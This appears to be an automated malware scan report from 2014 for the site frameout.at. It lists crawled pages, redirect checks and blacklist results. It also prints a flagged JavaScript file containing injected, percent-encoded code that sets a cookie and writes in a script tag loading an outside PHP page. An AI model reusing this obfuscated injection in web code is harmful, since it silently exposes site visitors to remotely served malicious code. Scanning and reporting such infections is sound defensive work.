Scanned pages/files
Request | Server response | Status |
http://frameout.at/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:28 GMT Location: http://frameout.at/pages.php?m=0 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages.php?m=0 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:28 GMT Location: pages/home.php?m=1&s= Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/home.php?m=1&s= | 200 OK Content-Length: 10756 Content-Type: text/html | clean |
http://frameout.at/pages/../lp_cms/includes/lp_list.js | 200 OK Content-Length: 17556 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var selectedGridTr="";
function disableSubs(val,tgtval,preselect) { TargetID = "lp_data"+tgtval; el=document.getElementById(TargetID); el.options.length=null; val = parseInt(val); switch (val) { case 1: enableArr = new Array(1,2,3,4,5,6,8); break; case 2: enableArr = new Array(); enableArr.push(7); break; case 3: enableArr = new Array(9,10); break; case 4: enableArr if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://frameout.at/pages.php?lng=&m=10 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:30 GMT Location: pages/impressum.php?m=10&s= Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/impressum.php?m=10&s= | 200 OK Content-Length: 7650 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:30 GMT Location: pages/home.php?m=1&s= Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:30 GMT Location: pages/programm%202014.php?m=19&s= Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s= | 200 OK Content-Length: 8117 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=75 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:30 GMT Location: pages/programm%202014.php?m=19&s=75 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=75 | 200 OK Content-Length: 10078 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=76 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:31 GMT Location: pages/programm%202014.php?m=19&s=76 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=76 | 200 OK Content-Length: 9699 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=77 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:31 GMT Location: pages/programm%202014.php?m=19&s=77 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=77 | 200 OK Content-Length: 13662 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=78 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:31 GMT Location: pages/programm%202014.php?m=19&s=78 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=78 | 200 OK Content-Length: 9412 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=79 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:32 GMT Location: pages/programm%202014.php?m=19&s=79 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=79 | 200 OK Content-Length: 10500 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=80 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:32 GMT Location: pages/programm%202014.php?m=19&s=80 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=80 | 200 OK Content-Length: 8541 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=81 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:32 GMT Location: pages/programm%202014.php?m=19&s=81 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=81 | 200 OK Content-Length: 11269 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=82 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:32 GMT Location: pages/programm%202014.php?m=19&s=82 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=82 | 200 OK Content-Length: 8408 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=83 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:33 GMT Location: pages/programm%202014.php?m=19&s=83 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=83 | 200 OK Content-Length: 10930 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=84 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:33 GMT Location: pages/programm%202014.php?m=19&s=84 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=84 | 200 OK Content-Length: 9917 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frameout.at
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 09 Oct 2014 09:44:28 GMT
Location: http://frameout.at/pages.php?m=0
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html
...0 bytes of data.
GET / HTTP/1.1
Host: frameout.at
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 09 Oct 2014 09:44:28 GMT
Location: http://frameout.at/pages.php?m=0
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: frameout.at
Referer: http://www.google.com/search?q=frameout.at
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: frameout.at
Referer: http://www.google.com/search?q=frameout.at
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frameout.at
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://frameout.at/
Result: frameout.at is not infected or malware details are not published yet.
Result: frameout.at is not infected or malware details are not published yet.